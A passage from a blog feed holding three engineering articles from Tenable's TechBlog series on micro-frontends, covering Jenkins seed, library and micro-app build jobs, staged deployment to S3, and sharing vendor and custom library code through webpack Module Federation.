Phase 2 Highlighted — Deploying to production environments

While this flow has more steps than our original one, we found that the pros outweigh the cons. Our builds are now more efficient as they can occur in parallel and only have to deal with a specific part of the repository. Additionally, our teams can now move at their own pace, deploying to production when they see fit.

Diving Deeper

Before You Proceed: The remainder of this article is very technical in nature and is geared towards engineers who wish to learn the specifics of how we build and deploy our applications.

Build Strategy

We will now discuss the three job types discussed above in more detail. These include the following: seed job, library job, and micro-app jobs.

The Seed Job

This job is responsible for first identifying what applications/libraries needed to be rebuilt. How is this done? We will now come full circle and understand the importance of introducing the NX framework that we discussed in a previous article. By taking advantage of this framework, we created a system by which we could identify which applications and libraries (our “workspaces”) were impacted by a given change in the system (via the nx affected command). Leveraging this functionality, the build logic was updated to include a Jenkins seed job. A seed job is a normal Jenkins job that runs a Job DSL script and in turn, the script contains instructions that create and trigger additional jobs. In our case, this included micro-app jobs and/or a library job which we’ll discuss in detail later.

Jenkins Status — An important aspect of the seed job is to provide a visualization for all the jobs it kicks off. All the triggered application jobs are shown in one place along with their status:

  • Green — Successful build
  • Yellow — Unstable
  • Blue — Still processing
  • Red (not shown) — Failed build

Github Status — Since multiple independent Jenkins builds are triggered for the same commit ID, we had to pay attention to the representation of the changes in GitHub to not lose visibility of broken builds in the PR process. Each job registers itself with a unique context with respect to github, providing feedback on what sub-job failed directly in the PR process:

Performance, Managing Dependencies — Before a given micro-app and/or library job can perform its necessary steps (lint, test, build), it needs to install the necessary dependencies for those actions (those defined in the package.json file of the project). Doing this every single time a job is run is very costly in terms of resources and performance. Since all of these jobs need the same dependencies, it makes much more sense if we can perform this action once so that all the jobs can leverage the same set of dependencies.

To accomplish this, the node execution environment was dockerised with all necessary dependencies installed inside a container. As shown below, the seed job maintains the responsibility for keeping this container in sync with the required dependencies. The seed job determines if a new container is required by checking if changes have been made to package.json. If changes are made, the seed job generates the new container prior to continuing any further analysis and/or build steps. The jobs that are kicked off by the seed (micro-app jobs and the library job) can then leverage that container for use:

This approach led to the following benefits:

  • Proved to be much faster than downloading all development dependencies for each build (step) every time needed.
  • The use of a pre-populated container reduced the load on the internal Nexus repository manager as well as the network traffic.
  • Allowed us to run the various build steps (lint, unit test, package) in parallel thus further improving the build times.

Performance, Limiting The Number Of Builds Run At Once — To facilitate the smooth operation of the system, the seed jobs on master and feature branch builds use slightly different logic with respect to the number of builds that can be kicked off at any one time. This is necessary as we have a large number of active development branches and triggering excessive jobs can lead to resource shortages, especially with required agents. When it comes to the concurrency of execution, the differences between the two are:

  • Master branch — Commits immediately trigger all builds concurrently.
  • Feature branches — Allow only one seed job per branch to avoid system overload as every commit could trigger 10+ sub jobs depending on the location of the changes.

Another attempt to reduce the amount of builds generated is the way in which the nx affected command gets used by the master branch versus the feature branches:

  • Master branch — Will be called against the latest tag created for each application build. Each master / production build produces a tag of the form APP<uniqueAppId>_<buildversion>. This is used to determine if the specific application needs to be rebuilt based on the changes.
  • Feature branches — We use master as a reference for the first build on the feature branch, and any subsequent build will use the commit-id of the last successful build on that branch. This way, we are not constantly rebuilding all applications that may be affected by a diff against master, but only the applications that are changed by the commit.

To summarize the role of the seed job, the diagram below showcases the logical steps it takes to accomplish the tasks discussed above.

The Library Job

We will now dive into the jobs that Seed kicks off, starting with the library job. As discussed in our previous articles, our applications share code from a libs directory in our repository.

Before we go further, it’s important to understand how library code gets built and deployed. When a micro-app is built (ex. nx build host), its deployment package contains not only the application code but also all the libraries that it depends on. When we build the Host and Application 1, it creates a number of files starting with “libs_…” and “node_modules…”. This demonstrates how all the shared code (both vendor libraries and your own custom libraries) needed by a micro-app is packaged within (i.e. the micro-apps are self-reliant). While it may look like your given micro-app is extremely bloated in terms of the number of files it contains, keep in mind that a lot of those files may not actually get leveraged if the micro-apps are sharing things appropriately.

This means building the actual library code is a part of each micro-app’s build step, which is discussed below. However, if library code is changed, we still need a way to lint and test that code. If you kicked off 5 micro-app jobs, you would not want each of those jobs to perform this action as they would all be linting and testing the exact same thing. Our solution to this was to have a separate Jenkins job just for our library code, as follows:

  1. Using the nx affected:libs command, we determine which library workspaces were impacted by the change in question.
  2. Our library job then lints/tests those workspaces. In parallel, our micro-apps also lint, test and build themselves.
  3. Before a micro-app can finish its job, it checks the status of the libs build. As long as the libs build was successful, it proceeds as normal. Otherwise, all micro-apps fail as well.

The Micro-App Jobs

Now that you understand how the seed and library jobs work, let’s get into the last job type: the micro-app jobs.

Configuration — As discussed previously, each micro-app has its own Jenkins build. The build logic for each application is implemented in a micro-app specific Jenkinsfile that is loaded at runtime for the application in question. The pattern for these small snippets of code looks something like the following:

The jenkins/Jenkinsfile.template (leveraged by each micro-app) defines the general build logic for a micro-application. The default configuration in that file can then be overwritten by the micro-app:

This approach allows all our build logic to be in a single place, while easily allowing us to add more micro-apps and scale accordingly. This combined with the job DSL makes adding a new application to the build / deployment logic a straightforward and easy to follow process.

Managing Parallel Jobs — When we first implemented the build logic for the jobs, we attempted to implement as many steps as possible in parallel to make the builds as fast as possible, which you can see in the Jenkins parallel step below:

After some testing, we found that linting + building the application together takes about as much time as running the unit tests for a given product. As a result, we combined the two steps (linting, building) into one (assets-build) to optimize the performance of our build. We highly recommend you do your own analysis, as this will vary per application.

Deployment strategy

Now that you understand how the build logic works in Jenkins, let’s see how things actually get deployed.

Checkpoints — When an engineer is ready to deploy their given micro-app to production, they use a checkpoint. Upon clicking into the build they wish to deploy, they select the checkpoints option. As discussed in our initial flow diagram, we force our engineers to first deploy to our staging environment for a final round of testing before they deploy their application to production.

The particular build in Jenkins that we wish to deploy
The details of the job above where we have the ability to deploy to staging via a checkpoint

Once approval is granted, the engineer can then deploy the micro-app to production using another checkpoint:

The build in Jenkins that was created after we clicked deployToQAStaging
The details of the job above where we have the ability to deploy to production via a checkpoint

S3 Strategy — The new logic required a rework of the whole deployment strategy as well. In our old architecture, the application was deployed as a whole to a new S3 location and then the central gateway application was informed of the new location. This forced the clients to reload the entire application as a whole.

Our new strategy reduces the deployment impact to the customer by only updating the code on S3 that actually changed. This way, whenever a customer pulls down the code for the application, they are pulling a majority of the code from their browser cache and only updated files have to be brought down from S3.

One thing we had to be careful about was ensuring the index.html file is only updated after all the granular files are pushed to S3. Otherwise, we run the risk of our updated application requesting files that may not have made their way to S3 yet.

Bootstrapper Job — As discussed above, micro-apps are typically deployed to an environment via an individual Jenkins job:

However, we ran into a number of instances where we needed to deploy all micro-apps at the same time. This included the following scenarios:

  • Shared state — While we tried to keep our micro-apps as independent of one another as possible, we did have instances where we needed them to share state. When we made updates to these areas, we could encounter bugs when the apps got out of sync.
  • Shared theme — Since we also had a global theme that all micro-apps inherited from, we could encounter styling issues when the theme was updated and apps got out of sync.
  • Vendor Library Update — Updating a vendor library like react where there could be only one version of the library loaded in.

To address these issues, we created the bootstrapper job. This job has two steps:

  1. Build — The job is run against a specific environment (qa-development, qa-staging, etc.) and pulls down a completely compiled version of the entire application.
  2. Deploy — The artifact from the build step can then be deployed to the specified environment.

Conclusion

Our new build and deployment flow was the final piece of our new architecture. Once it was in place, we were able to successfully deploy individual micro-apps to our various environments in a reliable and efficient manner. This was the final phase of our new architecture, please see the last article in this series for a quick recap of everything we learned.


8. Building & Deploying was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

7. Module Federation — Sharing Library Code

16 December 2021 at 18:44

Module Federation — Sharing Library Code

This is post 7 of 9 in the series

  1. Introduction
  2. Why We Implemented a Micro Frontend
  3. Introducing the Monorepo & NX
  4. Introducing Module Federation
  5. Module Federation — Managing Your Micro-Apps
  6. Module Federation — Sharing Vendor Code
  7. Module Federation — Sharing Library Code
  8. Building & Deploying
  9. Summary

Overview

This article focuses on the importance of sharing your custom library code between applications and some related best practices.

The Problem

As discussed in the previous article, sharing code is critical to using module federation successfully. In the last article we focused on sharing vendor code. Now, we want to take those same principles and apply them to the custom library code we have living in the libs directory. As illustrated below, App A and B both use Lib 1. When these micro-apps are built, they each contain a version of that library within their build artifact.

Assuming you read the previous article, you now know why this is important. As shown in the diagram below, when App A is loaded in, it pulls down all the libraries shown. When App B is loaded in it’s going to do the same thing. The problem is once again that App B is pulling down duplicate libraries that App A has already loaded in.

The Solution

Similar to the vendor libraries approach, we need to tell module federation that we would like to share these custom libraries. This way once we load in App B, it’s first going to check and see what App A has already loaded and leverage any libraries it can. If it needs a library that hasn’t been loaded in yet (or the version it needs isn’t compatible with the version App A loaded in), then it will proceed to load on its own. Otherwise, if it’s the only micro-app using that library, it will simply bundle a version of that library within itself (ex. Lib 2).

Diving Deeper

Before You Proceed: The remainder of this article is very technical in nature and is geared towards engineers who wish to learn more about sharing custom library code between your micro-apps. If you wish to see the code associated with the following section, you can check it out in this branch.

To demonstrate sharing libraries, we’re going to focus on Test Component 1 that is imported by the Host and Application 1:

This particular component lives in the design-system/components workspace:

We leverage the tsconfig.base.json file to build out our aliases dynamically based on the component paths defined in that file. This is an easy way to ensure that as new paths are added to your libraries, they are automatically picked up by webpack:

The aliases in our webpack.config are built dynamically based off the paths in the tsconfig.base.json file

How does webpack currently treat this library code? If we were to investigate the network traffic before sharing anything, we would see that the code for this component is embedded in two separate files specific to both Host and Application 1 (the code specific to Host is shown below as an example). At this point the code is not shared in any way and each application simply pulls the library code from its own bundle.

As your application grows, so does the amount of code you share. At a certain point, it becomes a performance issue when each application pulls in its own unique library code. We’re now going to update the shared property of the ModuleFederationPlugin to include these custom libraries.

Sharing our libraries is similar to the vendor libraries discussed in the previous article. However, the mechanism of defining a version is different. With vendor libraries, we were able to rely on the versions defined in the package.json file. For our custom libraries, we don’t have this concept (though you could technically introduce something like that if you wanted). To solve this problem, we decided to use a unique identifier to identify the library version. Specifically, when we build a particular library, we actually look at the folder containing the library and generate a unique hash based off of the contents of the directory. This way, if the contents of the folder change, then the version does as well. By doing this, we can ensure micro-apps will only share custom libraries if the contents of the library match.

We leverage the hashElement method from folder-hash library to create our hash ID
Each lib now has a unique version based on the hash ID generated

Note: We are once again leveraging the tsconfig.base.json to dynamically build out the libs that should be shared. We used a similar approach above for building out our aliases.

If we investigate the network traffic again and look for libs_design-system_components (webpack’s filename for the import from @microfrontend-demo/design-system/components), we can see that this particular library has now been split into its own individual file. Furthermore, only one version gets loaded by the Host application (port 3000). This indicates that we are now sharing the code from @microfrontend-demo/design-system/components between the micro-apps.

Going More Granular

Before You Proceed: If you wish to see the code associated with the following section, you can check it out in this branch.

Currently, when we import one of the test components, it comes from the index file shown below. This means the code for all three of these components gets bundled together into one file shown above as “libs_design-system_components_src_index…”.

Imagine that we continue to add more components:

You may get to a certain point where you think it would be beneficial to not bundle these files together into one big file. Instead, you want to import each individual component. Since the alias configuration in webpack is already leveraging the paths in the tsconfig.base.json file to build out these aliases dynamically (discussed above), we can simply update that file and provide all the specific paths to each component:

We can now import each one of these individual components:

If we investigate our network traffic, we can see that each one of those imports gets broken out into its own individual file:

This approach has several pros and cons that we discovered along the way:

Pros

  • Less Code To Pull Down — By making each individual component a direct import and by listing the component in the shared array of the ModuleFederationPlugin, we ensure that the micro-apps share as much library code as possible.
  • Only The Code That Is Needed Is Used — If a micro-app only needs to use one or two of the components in a library, they aren’t penalized by having to import a large bundle containing more than they need.

Cons

  • Performance — Bundling, the process of taking a number of separate files and consolidating them into one larger file, is a really good thing. If you continue down the granular path for everything in your libraries, you may very well find yourself in a scenario where you are importing hundreds of files in the browser. When it comes to browser performance and caching, there’s a balance to loading a lot of small granular files versus a few larger ones that have been bundled.

We recommend you choose the solution that works best based on your codebase. For some applications, going granular is an ideal solution and leads to the best performance in your application. However, for another application this could be a very bad decision, and your customers could end up having to pull down a ton of granular files when it would have made more sense to only have them pull down one larger file. So as we did, you’ll want to do your own performance analysis and use that as the basis for your approach.

Pitfalls

When it came to the code in our libs directory, we discovered two important things along the way that you should be aware of.

Hybrid Sharing Leads To Bloat — When we first started using module federation, we had a library called tenable.io/common. This was a relic from our initial architecture and essentially housed all the shared code that our various applications used. Since this was originally a directory (and not a library), our imports from it varied quite a bit. As shown below, at times we imported from the main index file of tenable-io/common (tenable-io/common.js), but in other instances we imported from sub directories (ex. tenable-io/common/component.js) and even specific files (tenable-io/component/component1.js). To avoid updating all of these import statements to use a consistent approach (ex. only importing from the index of tenable-io/common), we opted to expose every single file in this directory and shared it via module federation.

To demonstrate why this was a bad idea, we’ll walk through each of these import types: starting from the most global in nature (importing the main index file) and moving towards the most granular (importing a specific file). As shown below, the application begins by importing the main index file which exposes everything in tenable-io/common. This means that when webpack bundles everything together, one large file is created for this import statement that contains everything (we’ll call it common.js).

We then move down a level in our import statements and import from subdirectories within tenable-io/common (components and utilities). Similar to our main index file, these import statements contain everything within their directories. Can you see the problem? This code is already contained in the common.js file above. We now have bloat in our system that causes the customer to pull down more javascript than necessary.

We now get to the most granular import statement where we’re importing from a specific file. At this point, we have a lot of bloat in our system as these individual files are already contained within both import types above.

As you can imagine, this can have a dramatic impact on the performance of your application. For us, this was evident in our application early on and it was not until we did a thorough performance analysis that we discovered the culprit. We highly recommend you evaluate the structure of your libraries and determine what’s going to work best for you.

Sharing State/Storage/Theme — While we tried to keep our micro-apps as independent of one another as possible, we did have instances where we needed them to share state and theming. Typically, shared code lives in an actual file (some-file.js) that resides within a micro-app’s bundle. For example, let’s say we have a notifications library shared between the micro-apps. In the first update, the presentation portion of this library is updated. However, only App B gets deployed to production with the new code. In this case, that’s okay because the code is constrained to an actual file. In this instance, App A and B will use their own versions within each of their bundles. As a result, they can both operate independently without bugs.

However, when it comes to things like state (Redux for us), storage (window.storage, document.cookies, etc.) and theming (styled-components for us), you cannot rely on this. This is because these items live in memory and are shared at a global level, which means you can’t rely on them being confined to a physical file. To demonstrate this, let’s say that we’ve made a change to the way state is getting stored and accessed. Specifically, we went from storing our notifications under an object called notices to storing them under notifications. In this instance, once our applications get out of sync on production (i.e. they’re not leveraging the same version of shared code where this change was made), the applications will attempt to store and access notifications in memory in two different ways. If you are looking to create challenging bugs, this is a great way to do it.

As we soon discovered, most of our bugs/issues resulting from this new architecture came as a result of updating one of these areas (state, theme, storage) and allowing the micro-apps to deploy at their own pace. In these instances, we needed to ensure that all the micro-apps were deployed at the same time to ensure the applications and the state, store, and theming were all in sync. You can read more about how we handled this via a Jenkins bootstrapper job in the next article.

Summary

At this point you should have a fairly good grasp on how both vendor libraries and custom libraries are shared in the module federation system. See the next article in the series to learn how we build and deploy our application.


7. Module Federation — Sharing Library Code was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

6. Module Federation — Sharing Vendor Code

16 December 2021 at 17:16

Module Federation — Sharing Vendor Code

This is post 6 of 9 in the series

  1. Introduction
  2. Why We Implemented a Micro Frontend
  3. Introducing the Monorepo & NX
  4. Introducing Module Federation
  5. Module Federation — Managing Your Micro-Apps
  6. Module Federation — Sharing Vendor Code
  7. Module Federation — Sharing Library Code
  8. Building & Deploying
  9. Summary

Overview

This article focuses on the importance of sharing vendor library code between applications and some related best practices.

The Problem

One of the most important aspects of using module federation is sharing code. When a micro-app gets built, it contains all the files it needs to run. As stated by webpack, “These separate builds should not have dependencies between each other, so they can be developed and deployed individually”. In reality, this means if you build a micro-app and investigate the files, you will see that it has all the code it needs to run independently. In this article, we’re going to focus on vendor code (the code coming from your node_modules directory). However, as you’ll see in the next article of the series, this also applies to your custom libraries (the code living in libs). As illustrated below, App A and B both use vendor lib 6, and when these micro-apps are built they each contain a version of that library within their build artifact.

Why is this important? We’ll use the diagram below to demonstrate. Without sharing code between the micro-apps, when we load in App A, it loads in all the vendor libraries it needs. Then, when we navigate to App B, it also loads in all the libraries it needs. The issue is that we’ve already loaded in a number of libraries when we first loaded App A that could have been leveraged by App B (ex. Vendor Lib 1). From a customer perspective, this means they’re now pulling down a lot more Javascript than they should be.

The Solution

This is where module federation shines. By telling module federation what should be shared, the micro-apps can now share code between themselves when appropriate. Now, when we load App B, it’s first going to check and see what App A already loaded in and leverage any libraries it can. If it needs a library that hasn’t been loaded in yet (or the version it needs isn’t compatible with the version App A loaded in), then it proceeds to load its own. For example, App A needs Vendor lib 5, but since no other application is using that library, there’s no need to share it.

Sharing code between the micro-apps is critical for performance and ensures that customers are only pulling down the code they truly need to run a given application.

Diving Deeper

Before You Proceed: The remainder of this article is very technical in nature and is geared towards engineers who wish to learn more about sharing vendor code between your micro-apps. If you wish to see the code associated with the following section, you can check it out in this branch.

Now that we understand how libraries are built for each micro-app and why we should share them, let’s see how this actually works. The shared property of the ModuleFederationPlugin is where you define the libraries that should be shared between the micro-apps. Below, we are passing a variable called npmSharedLibs to this property:

If we print out the value of that variable, we’ll see the following:

This tells module federation that the three libraries should be shared, and more specifically that they are singletons. This means it could actually break our application if a micro-app attempted to load its own version. Setting singleton to true ensures that only one version of the library is loaded (note: this property will not be needed for most libraries). You’ll also notice we set a version, which comes from the version defined for the given library in our package.json file. This is important because anytime we update a library, that version will dynamically change. Libraries only get shared if they have a compatible version. You can read more about these properties here.

If we spin up the application and investigate the network traffic with a focus on the react library, we’ll see that only one file gets loaded in and it comes from port 3000 (our Host application). This is a result of defining react in the shared property:

Now let’s take a look at a vendor library that hasn’t been shared yet, called @styled-system/theme-get. If we investigate our network traffic, we’ll discover that this library gets embedded into a vendor file for each micro-app. The three files highlighted below come from each of the micro-apps. You can imagine that as your libraries grow, the size of these vendor files may get quite large, and it would be better if we could share these libraries.

We will now add this library to the shared property:

If we investigate the network traffic again and search for this library, we’ll see it has been split into its own file. In this case, the Host application (which loads before everything else) loads in the library first (we know this since the file is coming from port 3000). When the other applications load in, they determine that they don’t have to use their own version of this library since it’s already been loaded in.

This very significant feature of module federation is critical for an architecture like this to succeed from a performance perspective.

Summary

Sharing code is one of the most important aspects of using module federation. Without this mechanism in place, your application would suffer from performance issues as your customers pull down a lot of duplicate code each time they accessed a different micro-app. Using the approaches above, you can ensure that your micro-apps are both independent but also capable of sharing code between themselves when appropriate. This the best of the both worlds, and is what allows a micro-frontend architecture to succeed. Now that you understand how vendor libraries are shared, we can take the same principles and apply them to our self-created libraries that live in the libs directory, which we discuss in the next article of the series.


6. Module Federation — Sharing Vendor Code was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

❌
❌